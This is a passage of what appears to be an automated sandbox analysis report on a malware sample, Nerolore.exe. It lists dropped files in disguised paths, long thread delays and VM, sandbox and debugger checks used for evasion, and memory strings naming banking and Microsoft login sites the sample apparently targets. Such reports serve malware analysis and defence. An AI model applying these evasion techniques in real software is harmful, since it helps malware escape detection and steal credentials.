                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588937
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588828
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588718
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588598
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588484
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588374
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588265
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeWindow / User API: threadDelayed 844Jump to behavior
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWindow / User API: threadDelayed 5123
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWindow / User API: threadDelayed 4532
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\LtUgLbtj.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\xvosSKAI.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\vBGRGbPj.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\XwBnJZqg.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\goYNyXVt.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\EeOHqUfQ.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\GeIICmFp.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\EmyZUDGW.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\ddCMyFqs.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\ONhXawky.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exe TID: 2220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\ProgramData\dbg\conhost.exe TID: 5360Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\dbg\conhost.exe TID: 5228Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 2300Thread sleep time: -30000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -34126476536362649s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -600000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -599874s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -599765s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -599578s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -599437s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -599000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -598515s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -598405s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7444Thread sleep time: -600000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -597625s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -597500s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -597375s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -597000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -596859s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7444Thread sleep time: -10800000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -596734s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -596618s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -596406s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -596265s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -596048s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -595906s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -595701s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -595578s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -595435s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594927s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594812s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594702s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594592s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594480s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594374s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594240s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -594124s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -593954s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -593828s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -593688s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -593562s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -593443s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -592906s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -592240s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -592109s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591977s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591874s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591765s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591628s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591500s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591390s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591281s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591171s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -591062s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590939s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590812s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590702s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590581s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590453s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590343s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590230s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -590094s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -589524s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -589369s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -589259s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -589156s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -589046s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588937s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588828s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588718s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588598s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588484s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588374s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -588265s >= -30000s
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\FontHost\ContainerAgentWinSession.exe TID: 7252Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\FontHost\ContainerAgentWinSession.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\dbg\conhost.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe TID: 7416Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\dbg\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\dbg\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\dbg\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946856 NtQueryInformationProcess,GetSystemInfo,0_2_04946856
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 30000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 600000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599874
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599765
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599578
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599437
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 598515
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 598405
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 300000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597625
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597500
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597375
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596859
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 3600000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596734
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596618
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596406
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596265
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596048
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595906
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595701
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595578
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595435
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594927
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594812
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594702
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594592
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594480
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594374
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594240
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594124
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593954
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593828
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593688
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593562
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593443
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592906
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592240
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592109
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591977
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591874
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591765
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591628
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591500
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591390
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591281
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591171
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591062
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590939
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590812
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590702
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590581
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590453
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590343
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590230
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590094
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589524
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589369
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589259
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589156
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589046
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588937
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588828
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588718
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588598
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588484
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588374
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588265
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: MxuOpwHgrS.29.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: MxuOpwHgrS.29.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: ContainerAgentWinSession.exe, 00000005.00000002.2296482900.000000001C0FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: MxuOpwHgrS.29.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                              Source: MxuOpwHgrS.29.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: MxuOpwHgrS.29.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: MxuOpwHgrS.29.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: MxuOpwHgrS.29.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3387054500.000000001AD80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: MxuOpwHgrS.29.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: MxuOpwHgrS.29.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: w32tm.exe, 00000028.00000002.2329979953.00000119A22A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                              Source: MxuOpwHgrS.29.drBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: Nerolore.exe, 00000000.00000003.2087463788.000000000098C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\9
                              Source: MxuOpwHgrS.29.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: wscript.exe, 00000002.00000003.2221565780.000000000300F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: MxuOpwHgrS.29.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: MxuOpwHgrS.29.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                              Source: MxuOpwHgrS.29.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: MxuOpwHgrS.29.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                              Source: MxuOpwHgrS.29.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: MxuOpwHgrS.29.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: MxuOpwHgrS.29.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Hides threads from debuggers
                              Source: C:\Users\user\Desktop\Nerolore.exeThread information set: HideFromDebuggerJump to behavior
                              Tries to detect sandboxes and other dynamic analysis tools (window names)
                              Source: C:\Users\user\Desktop\Nerolore.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\Desktop\Nerolore.exeFile opened: SIWDEBUG
                              Source: C:\Users\user\Desktop\Nerolore.exeFile opened: NTICE
                              Source: C:\Users\user\Desktop\Nerolore.exeFile opened: SICE
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946070 mov eax, dword ptr fs:[00000030h]0_2_04946070
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946395 mov eax, dword ptr fs:[00000030h]0_2_04946395
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess token adjusted: DebugJump to behavior
